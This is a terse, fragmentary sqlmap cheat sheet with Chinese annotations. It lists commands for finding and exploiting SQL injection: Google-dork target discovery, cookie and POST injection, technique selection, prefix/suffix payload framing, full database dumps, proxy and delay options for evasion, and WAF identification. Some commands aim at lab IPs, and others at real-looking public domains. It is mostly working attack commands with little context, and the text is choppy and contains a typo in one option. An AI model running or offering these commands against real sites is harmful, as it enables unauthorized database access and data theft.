
|
sqlmap -u http://www.target.com/vuln.php?id=1
www.target1.com/vuln1.php?q=foobar www.target2.com/vuln2.asp?id=1 www.target3.com/vuln3/id/1*
POST /Less-18/ HTTP/1.1 Host: 192.168.64.252:8080 Content-Length: 38 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://192.168.64.252:8080 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.88 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.64.252:8080/Less-18/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close
uname=admin&passwd=admin&submit=Submit
sqlmap -g "inurl:php?id="
sqlmap -u "http://www.cracer.com/cracer.php" --data="id=1"
sqlmap -u "http://www.cracer.com/vuln.php" --data="query=foobar;d=1" --param-del=";"
sqlmap -u "http://www.ntjx.org/jsj/DownloadShow.asp" --cookie "id=9" --table --level 2
--hearders "client-ip: 1.1.1.1"
--proxy=http://127.0.0.1:1080 --proxy-file c:/1.txt
--delay
--timeout
--retries
--safe-url,--safe-freq
1. --safe-url:提供一个安全不错误的连接,每隔一段时间都会去访问一下. 2. --safe-freq:提供一个安全不错误的连接,每次测试请求之后都会再访问一边安全连接.
-p
--prefix,--suffix
$query = "SELECT * FROM users WHERE id=('" . $_GET['id'] . "') LIMIT 0, 1";
sqlmap -u "http://192.168.136.131/sqlmap/mysql/get_str_brackets.php?id=1" -p id --prefix "')" --suffix "AND ('abc'='abc"
$query = "SELECT * FROM users WHERE id=('1') <PAYLOAD> AND ('abc'='abc') LIMIT 0, 1";
--technique
B: Boolean-based blind SQL injection(布尔型注入) E: Error-based SQL injection(报错型注入) U: UNION query SQL injection(可联合查询注入) S: Stacked queries SQL injection(可多语句查询注入) T: Time-based blind SQL injection(基于时间延迟注入)
--union-cols
--union-char
--second-order
--dump-all,--exclude-sysdbs
--search,-C,-T,-D
-C后跟着用逗号分割的列名,将会在所有数据库表中搜索指定的列名. -T后跟着用逗号分割的表名,将会在所有数据库中搜索指定的表名 -D后跟着用逗号分割的库名,将会在所有数据库中搜索指定的库名.
-s,-t
--batch
--charset
--flush-session
--hex
sqlmap -u "http://192.168.48.130/sqlmap/pgsql/get_int.php?id=1" --banner --hex -v 3 --parse-errors
--output-dir
--parse-errors
--smart,--mobile
sqlmap -u "http://192.168.21.128/sqlmap/mysql/get_int.php?ca=17&user=foo&id=1" --batch --smart
--mobile
sqlmap -u "http://www.target.com/vuln.php?id=1" --mobile
--identify-waf
--check-waf
sqlmap -u "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1" --identify-waf -v 3
|